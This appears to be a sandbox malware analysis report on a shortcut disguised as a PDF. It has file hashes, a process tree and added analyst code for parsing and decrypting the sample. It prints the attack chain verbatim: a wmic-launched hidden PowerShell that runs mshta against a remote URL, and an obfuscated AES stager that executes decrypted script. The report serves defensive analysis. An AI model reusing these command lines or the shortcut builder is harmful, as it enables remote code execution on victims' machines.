                                              MD5:38D90065208DA1D895CC718FCDF7207F
                                              SHA1:42B7D65BCDEAFD473D52CBF25C383079BF8729D2
                                              SHA-256:D085AEC2171F071A230DE6594AC4B3252491D8C30F47087B07D00F81B31DE949
                                              SHA-512:F66E7F07F4C6DFED8952010EAC09ADF6C60991DD1DFE1CB3B0551ACE447FC36977490A6930A8DCB8CF9C747CFC1BCE990DC063A40FE9ACCBBE39AF09AF25691A
                                              Malicious:false
                                              Preview:!<arch>./ 1695742191 0 222750 `................~...~...........j...j...........@...@.........&...&.................~...~...........N...N.........$...$.................b...b...........:...:.................x...x...........J...J...............................j...j...........Z...Z...........N...N...........P...P...........\...\...........n...n.........................x...x...........t...........J...J...............................v...v...........T...T...........D...D.........&...&...........................................................h...h...........F.................................j...j...........V...V...........L...L.........4...4...........&...&...................................................................|...|...........l...l...........X...X...........D...D...........0...0...................................r...r...........\...\...........J...J...........@...@...........,...,...........(...(................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):277504
                                              Entropy (8bit):6.237513941837174
                                              Encrypted:false
                                              SSDEEP:6144:3j/sVYUspTJMU5Gjw0u864KwtaxOf9yCPx3lBIzN:bsVYnpVMYGjw6dxVQ
                                              MD5:D096BED0C306438803F40DAA22F91504
                                              SHA1:BE0B7EB82334F5250C6D71E3167B23BF51929689
                                              SHA-256:ADA21F28ED808FFA6ECC6D199D8AC3A8ADC95BF9724443CC4B99371F1666DD44
                                              SHA-512:CDEEDAA4B2F682FD0E211B0C3C266EC3E1658C5ED3DC945D96093A6FE88226F11A0B4D96A5CA8E6AD427C364FA1B12A6BB4AA7F7F0883A5D2278FAD8B2F5420F
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..R..R..[.5.\......P......P..4.[.U......\......Z......V.....Q..R..L.....F.....S...Y.S.....S..RichR..................PE..d...C..e.........." .........~...........................................................`A.........................................................`..X....0... ...........p..H...0...T.......................(.......8............................................text............................... ..`.rdata...E.......F..................@..@.data...`.... ......................@....pdata... ...0..."..................@..@.rsrc...X....`.......,..............@..@.reloc..H....p.......6..............@..B................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):9077248
                                              Entropy (8bit):6.586126818604595
                                              Encrypted:false
                                              SSDEEP:98304:E7hOE9Uen+KS14ueJmHCqR2nOTA4EMSfV/1Zl2MCFue9eCedq5N6QBAUZLD4LK:E7NJnmWveDR2OTA2r6QVX4e
                                              MD5:444C82F2BD2C8FE20AAE7654AF26E3C8
                                              SHA1:E2AD31E2230138DA62605FE2A4FDDCED8A518981
                                              SHA-256:503D6C312542680A1DA566FE793A8A7173EC0D0EE33474A164073517ECCAFB3F
                                              SHA-512:0F007B2F4FDBD0FA2EFFE6F32E168B8BB9C9270EDF06CB0ADC310396F6F1B092026090888292D2F04EA0E9D884C49355C6888A1CFDF0B652553EFEFF216331C3
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......=.u.y...y...y...p...o...+...{.......o...+...u...+...q...+...}...O...........P......k...y.......2...h...............q.......{.......x.......x.......x...Richy...................PE..d...-..e.........." .....VW..(3.......>......................................`...........`A..........................................x...h........0...........i...........@..D...$.n.T.....................o.(.....n.8............pW..............................text...eTW......VW................. ..`.rdata..DB...pW..D...ZW.............@..@.data... ........X..................@....pdata...i.......j..................@..@.rsrc........0.......`..............@..@.reloc..D....@.......j..............@..B................................................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):279552
                                              Entropy (8bit):6.235843908006801
                                              Encrypted:false
                                              SSDEEP:6144:QVMq2esj6Zv4+xEIu864KMnxOf9yCPx3lB8d:M2ena+xE+0xV2
                                              MD5:692347C90EBF1227B717A0C8A3DAE8C3
                                              SHA1:2D96EE9224FF50BC6ADBF3C2B04945151BE7CB1A
                                              SHA-256:6014457715ED97F72D4B4E372119D7D870299EB2DF1DA5EC5D7A3A61D101F9DA
                                              SHA-512:090059D7FBBB4D373BAC16995FA418DFF8CDD83DFF70C9CD959C17BFF7D0CEF9EA40431EAAC12C40EBF7AC36B0151284A110DAF11E368541D4F898144BE7C347
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1...8.k.!...c...3...z...3...W...6...c...$...c...;...c...5.......2...1...........%.......0.......0.......0...Rich1...................PE..d......e..........".................@..........@....................................nC....`..........................................................`.......0... ..............L......T.......................(...@...8............................................text...!........................... ..`.rdata...G.......H..................@..@.data...p.... ......................@....pdata... ...0..."..................@..@.rsrc........`.......,..............@..@.reloc..L............>..............@..B................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):30888
                                              Entropy (8bit):5.300461092105552
                                              Encrypted:false
                                              SSDEEP:768:29wLJhkF4Vg4DJR6I6guWL4hF2Lq4wlHxLL3OMoL9C/QnsJrLOIWcydFkjNvzYgp:TLQX4DOIlL02Lq4wlxLLBKXncrLOQaF8
                                              MD5:D4EDD51CF7878E1AAFE799E0F5CE3B5A
                                              SHA1:4F4C5844415D89826814371A7DEF58DEDBC316AC
                                              SHA-256:878CA254C4EDBB517C614F7234C694E828E2B1519F7858FF4AA696F28B182A29
                                              SHA-512:39A8630937FB443880177636E3E8EA5FB1E4EF60013077502D278D926BCBD86A91825917213EADA38E93152C2D74E7A1E8C1243B8A4F6344609CAFCD90E1F70E
                                              Malicious:false
                                              Preview: 1. libmagic (ext/fileinfo) see ext/fileinfo/libmagic/LICENSE.. 2. libmbfl (ext/mbstring) see ext/mbstring/libmbfl/LICENSE.. 3. pcre2lib (ext/pcre).. 4. ext/standard crypt.. 5. ext/standard crypt's blowfish implementation.. 6. ext/standard/rand.. 7. ext/standard/scanf.. 8. ext/standard/strnatcmp.c.. 9. ext/standard/uuencode..10. main/snprintf.c..11. main/strlcat..12. main/strlcpy..13. libgd (ext/gd)..14. ext/phar portions of tar implementations..15. ext/phar/zip.c portion extracted from libzip..16. libbcmath (ext/bcmath) see ext/bcmath/libbcmath/LICENSE..17. ext/mbstring/ucgendat portions based on the ucgendat.c from the OpenLDAP..18. avifinfo (ext/standard/libavifinfo) see ext/standard/libavifinfo/LICENSE..19. xxHash (ext/hash/xxhash)......3. pcre2lib (ext/pcre)....PCRE2 LICENCE..-------------....PCRE2 is a library of functions to support regular expressions whose syntax..and semantics are as close as possible to those of the Perl 5 language.....Releases 10.00 and above of PCRE2 are d
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:ASCII text, with CRLF, LF line terminators
                                              Category:dropped
                                              Size (bytes):2286
                                              Entropy (8bit):4.47005475174161
                                              Encrypted:false
                                              SSDEEP:24:Mvw6OL7ANOxqDvBEEsyodGmlDOfZGpiFGpomfflmicfJmfoZGmMoIB9m4B9CB99w:p6k7yacXOBiZ/dul69HrwqwMIymwMt
                                              MD5:AA066FEEBCD5370ED6B246B2814DEC7F
                                              SHA1:5E01108044D6ABAF77779A0AD13BA5FA803E6F57
                                              SHA-256:5FC601723F752A02F48211C431CCC62E345DA5EB1CFDE87E3A966169E21DBCFC
                                              SHA-512:96DE7504F50F170868B37720B48F9F49124CA66C8D8940A514D9BA91F83317D167E39D1E18F907C609409CFD28B3B43B2D14088AB41A047D174309CC91073400
                                              Malicious:false
                                              Preview:This snapshot was automatically generated on.Tue, 26 Sep 2023 16:00:52 +0000..Version: 8.2.11.Branch: HEAD.Build: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS...Built-in Extensions..===========================..Core..bcmath..calendar..ctype..date..filter..hash..iconv..json..SPL..pcre..readline..Reflection..session..standard..mysqlnd..tokenizer..zip..zlib..libxml..dom..PDO..openssl..SimpleXML..xml..xmlreader..xmlwriter..curl..ftp..sqlite3..Phar..mbstring..mysqli......Dependency information:..Module: php_curl.dll..===========================...libcrypto-3-x64.dll...libssl-3-x64.dll...libssh2.dll...nghttp2.dll....Module: libssl-3-x64.dll..===========================...libcrypto-3-x64.dll....Module: libssh2.dll..===========================...libcrypto-3-x64.dll....Module: php_enchant.dll..===========================...libenchant2.dll....Module: libenchant2.dll..===========================...glib-2.dll...gmodule-2.dll....Module: gmodule-2.dll..===========================...glib-2.dll...
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):109440
                                              Entropy (8bit):6.642252418996898
                                              Encrypted:false
                                              SSDEEP:1536:BcghDMWyjXZZIzpdbJhKm6Kuzu8fsecbq8uOFQr+zMtY+zA:BVHyQNdbJAKuzRsecbq8uOFvyU
                                              MD5:49C96CECDA5C6C660A107D378FDFC3D4
                                              SHA1:00149B7A66723E3F0310F139489FE172F818CA8E
                                              SHA-256:69320F278D90EFAAEB67E2A1B55E5B0543883125834C812C8D9C39676E0494FC
                                              SHA-512:E09E072F3095379B0C921D41D6E64F4F1CD78400594A2317CFB5E5DCA03DEDB5A8239ED89905C9E967D1ACB376B0585A35ADDF6648422C7DDB472CE38B1BA60D
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{n...=...=...=l..<...=...=...=...=...=...<...=...<...=...<...=...<...=...=...=...<...=Rich...=........PE..d.....K..........." ...$.....`............................................................`A........................................`C..4....K...............p..|....\...O...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata..|....p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):273408
                                              Entropy (8bit):6.148079366490214
                                              Encrypted:false
                                              SSDEEP:6144:NEcJbsK5ZcOHlIrANgOPHF6nHsohRH17nMu:TsfcIrYPoF7n
                                              MD5:F63E0C410E4CA83CDA47BA4871AEAC30
                                              SHA1:383EA6241C5E770E291A50448653C14B1090C122
                                              SHA-256:039AD045C278A28CFC1A4322AF289D7250BED30B82032201CCD5BED3874D99F4
                                              SHA-512:32654BAA8994F993AFB54A337BABE14B9302CCB04D5A0D936F9CEA234CCD04972F4C3BFA2D8D6F7BB0DB82BDA8C43A17A1868FC1EA9646B5818ECDD727D8B778
                                              Malicious:true
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............g.}.g.}.g.}...|.g.}...|og.}z..|.g.}z..|.g.}...|.g.}.g.}.g.}z..|.g.}...|.g.}S..|.g.}S..|.g.}Rich.g.}........................PE..d...P.yg.........."............................@.............................p............`.....................................................d............ ...............`..................................(.......8............................................text...l........................... ..`.rdata...;.......<..................@..@.data...<+..........................@....pdata....... ...0..................@..@_RDATA.......P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):55
                                              Entropy (8bit):4.306461250274409
                                              Encrypted:false
                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                              Malicious:false
                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                              Process:C:\Windows\System32\wbem\WMIC.exe
                                              File Type:ASCII text, with CRLF, CR line terminators
                                              Category:dropped
                                              Size (bytes):160
                                              Entropy (8bit):5.095703110114614
                                              Encrypted:false
                                              SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MglTBlJQAiveyzowv:Yw7gJGWMXJXKSOdYiygKkXe/egbleAin
                                              MD5:E8E5D6D0D2936B1BA66F8A8E7C6EC6B5
                                              SHA1:7E4BF87B0D3815676AE02C7FBA0D1482332AC1E9
                                              SHA-256:6834A532E0C06531268E58D2C385C1EBCAA01C9B1AD4188F57F102E4680AF2DC
                                              SHA-512:499BA1AC1C6B32BA0C53F7B98CC7311988B23997C5B249F4881A8C6786CA388C760385E7042B7425EB97219886A19E96B443572B148652627B322F84C250B866
                                              Malicious:false
                                              Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 7628;...ReturnValue = 0;..};....
                                              File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                              Entropy (8bit):2.6180398785972723
                                              TrID:
                                              • Windows Shortcut (20020/1) 100.00%
                                              File name:HateSpeech2024_Summary.pdf.lnk.bin.lnk
                                              File size:1'894 bytes
                                              MD5:97d7ccb68cdc1beaee32700a58e8f901
                                              SHA1:c16d12acb3de008be42cd1d5527ee5ecd51d6354
                                              SHA256:9315c00b9914f987381604b289e426dab0e6c8eefd7ccb0656c2cde5503800c7
                                              SHA512:e21da7ad127352c9fc46991daeb5841fff7fab972b12eda9c6e912e9de231d7d28ecbadef635129682e5024257d1026c473088467cb993f4957aa29920a434c1
                                              SSDEEP:24:8AyH/BUlgKN4eH+/3/kWNdk6Zocxb5qdd79dsH/G4G:89uGeA/ldkUNEdJ9eh
                                              TLSH:E64171001AED0B20F3B38D725876B715D97F788DDE734E0C004185881872620E875F9F
                                              File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                              Icon Hash:929e9e96a3f3d6ed

                                              General

                                              Relative Path:..\..\..\Windows\System32\Wbem\wmic.exe
                                              Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')"
                                              Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
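The three fields above are the whole attack: the shortcut's relative path points at wmic.exe, the argument string asks WMI to create a PowerShell process, and that PowerShell builds the string `mshta.exe https://myfilebuilders.com/samm` from four single-quoted fragments so the literal `mshta` never appears in the LNK bytes (`-w 1` is `-WindowStyle Hidden`). The icon is borrowed from msedge.exe so the file does not look like a shortcut to a system binary. Two practitioner notes: a process created through `Win32_Process.Create` shows up in process-creation telemetry with WmiPrvSE.exe as its parent, not wmic.exe, so a parent/child rule keyed on wmic misses it and the detection has to match wmic's own command line (which is what the "Suspicious Process Created Via Wmic.EXE" hit does); and the zeroed timestamps in the file-type line (`Sun Dec 31 23:25:52 1600`, i.e. FILETIME 0) mean the link target metadata carries no useful timeline.

The following is an added example, not Joe Sandbox's code or anything recovered from the sample: it builds a constructed minimal .lnk (no LinkInfo block, an empty IDList, and an assumed ShowCommand of 7) from the three values in the General section, parses it back using the MS-SHLLINK header and StringData layout, statically folds the `('ms' + 'hta' + ...)` concatenation, and applies the checks that correspond to this report's Sigma hits. The field names in the returned dictionaries and the LOLBin list are the example's own choices.

```python
"""Added example (not Joe Sandbox or sample code): build and parse a Shell Link,
recover the launch command, fold PowerShell string concatenation, and triage it."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80

# Constructed input: the three values from this report's "General" section.
SAMPLE_RELPATH = r"..\..\..\Windows\System32\Wbem\wmic.exe"
SAMPLE_ARGS = ("process call create \"powershell -w 1 powershell -Command "
               "('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')\"")
SAMPLE_ICON = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"


def build_lnk(relative_path: str, arguments: str, icon: str, show_command: int = 7) -> bytes:
    """Constructed minimal .lnk: 76-byte header, empty IDList, three Unicode StringData fields."""
    flags = HAS_IDLIST | HAS_RELPATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0,
                         0, 0, 0, 0, 11, show_command, 0, 0, 0, 0)   # zero FILETIMEs, IconIndex 11
    idlist = struct.pack("<H", 2) + b"\x00\x00"                     # IDListSize + TerminalID only
    def sd(s: str) -> bytes:                                         # CountCharacters + UTF-16LE
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + idlist + sd(relative_path) + sd(arguments) + sd(icon)


def parse_lnk(data: bytes) -> dict:
    """Extract ShowCommand and the StringData fields from a Shell Link."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    out = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    pos = 0x4C
    if flags & HAS_IDLIST:                      # skip IDListSize (2) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                    # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for bit, key in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                     (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                     (HAS_ICON, "icon_location")):
        if flags & bit:                         # StringData: CountCharacters, then chars, no terminator
            n = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            out[key] = data[pos:pos + n * width].decode("utf-16-le" if width == 2 else "cp1252")
            pos += n * width
    return out


_CONCAT = re.compile(r"\(\s*'[^']*'(?:\s*\+\s*'[^']*')+\s*\)")
_URL = re.compile(r"https?://[^\s\"')]+")
_LOLBIN = re.compile(r"\b(wmic|powershell|mshta|wscript|cscript|rundll32|regsvr32)(?:\.exe)?\b", re.I)


def fold_string_concat(text: str) -> str:
    """Statically evaluate ('ms' + 'hta' + ...); single-quoted literals never expand, so this is exact."""
    return _CONCAT.sub(lambda m: "".join(re.findall(r"'([^']*)'", m.group(0))), text)


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def assess(lnk: dict) -> dict:
    """Triage the launch command of a parsed LNK with checks matching this report's Sigma hits."""
    cmd = lnk.get("relative_path", "") + " " + lnk.get("arguments", "")
    folded = fold_string_concat(cmd)
    chain: list = []
    for name in (m.lower() + ".exe" for m in _LOLBIN.findall(folded)):
        if name not in chain:
            chain.append(name)
    low = folded.lower()
    return {
        "folded": folded, "chain": chain, "urls": _URL.findall(folded),
        "findings": {
            # WMI-created child has WmiPrvSE.exe as parent, so key on wmic's own arguments
            "wmic_process_create": "wmic.exe" in chain and "process call create" in low,
            "mshta_remote_url": "mshta.exe" in chain and bool(_URL.search(folded)),
            "string_concat_obfuscation": folded != cmd,
            "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", low)),
            "icon_mismatch": bool(lnk.get("icon_location"))
                             and _base(lnk["icon_location"]) != _base(lnk.get("relative_path", "")),
        },
    }


if __name__ == "__main__":
    result = assess(parse_lnk(build_lnk(SAMPLE_RELPATH, SAMPLE_ARGS, SAMPLE_ICON)))
    print(" -> ".join(result["chain"]), result["urls"])
    print([k for k, v in result["findings"].items() if v])
```

Run against the constructed shortcut, `assess` reports the chain `wmic.exe -> powershell.exe -> mshta.exe`, the single URL, and all five findings. Against a real sample, feed `parse_lnk` the file bytes; the parser skips the LinkTargetIDList and LinkInfo blocks by their declared sizes, which is enough for the StringData fields but does not validate those blocks, so a malformed size in either will simply shift the string offsets.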
                                              No network behavior found

                                              Target ID:0
                                              Start time:04:43:53
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')"
                                              Imagebase:0x7ff7f86e0000
                                              File size:576'000 bytes
                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:1
                                              Start time:04:43:53
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:2
                                              Start time:04:43:54
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:04:43:54
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:04:43:55
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://myfilebuilders.com/samm"
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:04:43:55
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\mshta.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\mshta.exe" https://myfilebuilders.com/samm
                                              Imagebase:0x7ff7a8c10000
                                              File size:14'848 bytes
                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:6
                                              Start time:04:43:57
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:7
                                              Start time:04:43:59
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.Length)); sal fd $PwiNROQ.Substring(3,3); fd $PwiNROQ.Substring(6)
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true
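
The Target ID 7 command line above is the second-stage stager: it treats the first 2464 hex characters of $ddg as AES ciphertext, uses the remaining hex as the key, decrypts with a 16-byte all-zero IV and the .NET Aes defaults (CBC, PKCS7), turns the plaintext bytes into a string one character per byte, aliases the three-character command found at offset 3 to fd, and feeds everything after offset 6 to it. The PowerShell below is an added example written for this page, not code from the sample or from Joe Sandbox: it reimplements that decryption path so an analyst can read the next stage instead of running it. Because the report elides the real $ddg value, the example manufactures its own test vector (constructed key, constructed plaintext, and iex as a stand-in command name, which is an assumption about the layout, not a value taken from the sample); to apply it to the sample, pass the captured $ddg string as -Blob with -Split 2464.

```powershell
# Added example (not from the sample or the report): a defanged re-implementation of the
# stager's AES decryption so the next stage can be read as data instead of executed.

function Convert-HexToBytes {
    param([Parameter(Mandatory)][string]$Hex)
    if ($Hex.Length % 2 -ne 0) { throw "Hex string has odd length ($($Hex.Length))." }
    $bytes = New-Object byte[] ($Hex.Length / 2)
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $bytes[$i] = [Convert]::ToByte($Hex.Substring(2 * $i, 2), 16)
    }
    return ,$bytes
}

function Unprotect-Stager {
    # Mirrors the sample's routine: ciphertext = hex[0..Split), key = hex[Split..],
    # IV = 16 zero bytes, Aes defaults (CBC, PKCS7). Nothing here is passed to an alias.
    param(
        [Parameter(Mandatory)][string]$Blob,
        [Parameter(Mandatory)][int]$Split      # 2464 for the command line in this report
    )
    $cipherBytes = Convert-HexToBytes ($Blob.Substring(0, $Split))
    $keyBytes    = Convert-HexToBytes ($Blob.Substring($Split))
    if ($keyBytes.Length -notin 16, 24, 32) {
        throw "Key material is $($keyBytes.Length) bytes; expected 16, 24 or 32. Check -Split."
    }
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key = $keyBytes
        $aes.IV  = New-Object byte[] 16
        $decryptor  = $aes.CreateDecryptor()
        $plainBytes = $decryptor.TransformFinalBlock($cipherBytes, 0, $cipherBytes.Length)
    } finally {
        $aes.Dispose()
    }
    # The stager calls [String]::new() on the byte array; PowerShell satisfies that by widening
    # each byte to a char. -join over [char[]] reproduces that one-byte-per-char decoding.
    $text = -join ([char[]]$plainBytes)
    if ($text.Length -lt 6) { throw "Decrypted text too short for the stager's layout; wrong key or split?" }
    [pscustomobject]@{
        Skipped = $text.Substring(0, 3)     # three leading characters the stager discards
        Command = $text.Substring(3, 3)     # what the stager aliases to 'fd'
        Script  = $text.Substring(6)        # what the stager would have executed
    }
}

function New-ConstructedBlob {
    # Builds a test vector in the stager's layout. Key and plaintext are invented for this
    # example; 'iex' is an assumed stand-in for the command name, not a value from the sample.
    $key   = [byte[]](1..16)
    $plain = 'abc' + 'iex' + 'Write-Host "decoded, not executed"'
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key = $key
        $aes.IV  = New-Object byte[] 16
        $raw = [byte[]][char[]]$plain
        $ct  = $aes.CreateEncryptor().TransformFinalBlock($raw, 0, $raw.Length)
    } finally {
        $aes.Dispose()
    }
    $hex = -join (($ct + $key) | ForEach-Object { $_.ToString('x2') })
    [pscustomobject]@{ Blob = $hex; Split = $ct.Length * 2 }
}

# Demonstration on the constructed vector.
$vector = New-ConstructedBlob
$stage  = Unprotect-Stager -Blob $vector.Blob -Split $vector.Split
"Command aliased to fd : $($stage.Command)"
"Recovered script      : $($stage.Script)"
```

Two things to check when running this against a real capture: the Command field should be a cmdlet or alias you recognise before you trust the rest of the output, and the decryptor only matches the sample because the sample leaves Mode and Padding at the .NET defaults; a variant that sets them explicitly needs the same settings here.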

                                              Target ID:8
                                              Start time:04:43:59
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:04:44:01
                                              Start date:05/01/2025
                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              Wow64 process (32bit):false
